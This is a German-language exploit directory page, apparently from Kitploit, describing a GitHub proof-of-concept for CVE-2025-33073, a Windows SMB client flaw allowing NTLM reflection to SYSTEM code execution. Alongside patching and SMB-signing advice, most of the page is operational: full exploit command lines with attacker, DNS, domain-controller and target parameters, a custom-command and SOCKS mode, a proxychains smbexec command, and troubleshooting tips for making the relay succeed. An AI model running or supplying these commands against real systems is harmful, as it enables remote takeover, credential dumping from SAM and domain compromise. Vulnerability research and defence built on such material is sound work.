Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Blackash-CVE-2025-33073 — CVE-2025-33073 | Kitploit
Tools/GitHubGitHub/irjfifndn-prog/blackash-cve-2025-33073
SchwachstellenanalyseExploitationLaterale BewegungPenetrationstestsCommand and ControlRed TeamingPayload-Entwicklung
GitHubirjfifndn-prog/blackash-cve-2025-33073

Blackash-CVE-2025-33073

CVE-2025-33073

Repository anzeigen
23vor 10 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

✨ CVE-2025-33073: Windows SMB RCE-Schwachstelle 🚨

🔥 Hochschwere authentifizierte Remote-Codeausführung 🔥 Fehlerhafte Zugriffskontrolle im Windows-SMB-Client (CWE-284)


🛡️ Wichtige Details auf einen Blick

AspektDetails
CVSS-v3.1-Score8.8 (Hoch) 🔥
Betroffene SystemeWindows 10, 11, Server 2012–2025 (alle Editionen) 💻
Offenlegungsdatum10. Juni 2025 📅 (Behoben im Patch-Dienstag Juni 2025)
AusnutzungAktiv in freier Wildbahn ausgenutzt 😱
Am 21. Okt. 2025 zur CISA KEV hinzugefügt
AngriffsvektorNetzwerk (authentifiziert) 🌐
AuswirkungCodeausführung mit SYSTEM-Rechten 👑
Seitwärtsbewegung über Kerberos-Relay
UmgehungNTLM-Reflection-Gegenmaßnahmen ⚡

🛠️ Sofortige Gegenmaßnahmen

  1. Jetzt patchen! 🔧
    → Wenden Sie Microsoft-Updates an (z. B. KB5060998)
    → Microsoft Update-Anleitung 🔗

  2. SMB-Signierung aktivieren ✍️
    → Erzwingen Sie diese auf allen Clients und Servern
    → Set-SmbClientConfiguration -RequireSecuritySignature $true

  3. NTLM einschränken 🚫
    → Blockieren Sie NTLM, wo möglich
    → Überwachen Sie Relay-Versuche mit EDR-Tools

  4. Automatischer Fix? 🤖
    → Verwenden Sie Vicarius vRx oder eigene Skripte für die Massenbehebung


⚠️ Warum das wichtig ist

  • Umgeht traditionelle NTLM-Schutzmaßnahmen 🛑
  • Funktioniert auch, wenn SMB-Signierung nicht erzwungen ist
  • Ermöglicht vollständige Domain-Übernahme in falsch konfigurierten AD-Umgebungen 🏰

Stand: 15. November 2025:
✅ Gepatcht
❌ Wird in ungepatchten Systemen weiterhin ausgenutzt
🔔 CISA-Frist: 10. Nov. 2025 ⏰


⚠️ Beispielverwendung

GUI

sudo python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65
454875044-83ce744a-161e-4c0f-9f2d-6d57f23a913c

CLI

sudo python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only
455126200-fff4fcde-0a93-43c9-b93e-990554ccb689

Benutzerdefinierter Befehl Anstatt secretsdump auszuführen, kann ein benutzerdefinierter Befehl ausgeführt werden.

sudo python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only --custom-command "whoami"
455135898-1a054df7-ba08-4c9c-a4cf-737eb0827534

SOCKS Für eine heimlichere Ausführung von Befehlen, nachdem eine gültige Verbindung als SYSTEM hergestellt wurde. --target und --target-ip sollten hier gleich sein.

python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target 192.168.178.65 --target-ip 192.168.178.65 --cli-only --socks
455140618-8cf77803-f417-4abe-a993-746049b2634c

Außerdem kann ein benutzerdefinierter Befehl über proxychains ausgeführt werden, anstatt SAM zu dumpen.

proxychains nxc smb 192.168.178.65 -d '' -u '' -p '' -x 'whoami' --exec-method smbexec
455140896-6ecf0e32-ccd2-4a61-a024-644b214607ea

Manueller Exploit ohne DNS-Anforderung

Wenn Sie sich in derselben Broadcast-Domäne wie das Gerät befinden und es anfällig für LLMNR-Poisoning ist, ist es möglich, ein Gerät auszunutzen, ohne einen DNS-Eintrag registrieren zu müssen.

455277712-20c81ea0-88bf-4334-98aa-d2cb93f473b1

Fehlerbehebung:

  • Ich habe gesehen, dass der Angriff manchmal nicht funktioniert, weil der Hostname für den Angriff verwendet wird, was zu einem DNS-Lookup von Kali führt. Wenn Kali den DNS-Server nicht verwendet oder Sie eine '/ FAILED'-Meldung von impacket-ntlmrelayx erhalten, versuchen Sie, den Host zu Ihrer /etc/hosts-Datei hinzuzufügen. Dies sollte dazu führen, dass der Angriff funktioniert.

  • Wenn IP verwendet wird, sollte der Angriff funktionieren. Manchmal führt eine mehrmalige Ausführung zu einem SUCCESS statt zu einem Fehlschlag. Es ist bis jetzt nicht ganz klar, warum das passiert. Ich denke, es hat etwas mit dem Netzwerk zu tun.

  • Versuchen Sie eine andere Coerce-Methode mit -M oder --method.


Wireshark:

Lokale NTLM-Authentifizierung findet statt

455252866-0a3fe643-2d52-427a-91f2-991770732f62

Lokale NTLM-Authentifizierung findet nicht statt, was zu einem fehlgeschlagenen Versuch führt

455252901-7f6e900a-1c5b-4bc6-b5ae-79dbbe3f7348

Gut zu wissen:

  • xterm ermöglicht Kopieren und Einfügen mit der mittleren Maustaste.
  • Der DNS-Eintrag sollte auch dem Client bekannt sein; das kann in manchen Fällen länger dauern. Mit „länger" meine ich: Geben Sie ihm ein paar Minuten.
  • Dies ist nur ein PoC, was bedeutet, dass nicht versucht wurde, AV/EDR zu umgehen. Nutzung auf eigenes Risiko.

Zögern Sie nicht — patchen Sie heute! 🛑
Die Sicherheit Ihres Netzwerks hängt davon ab. 💪

Tool herunterladen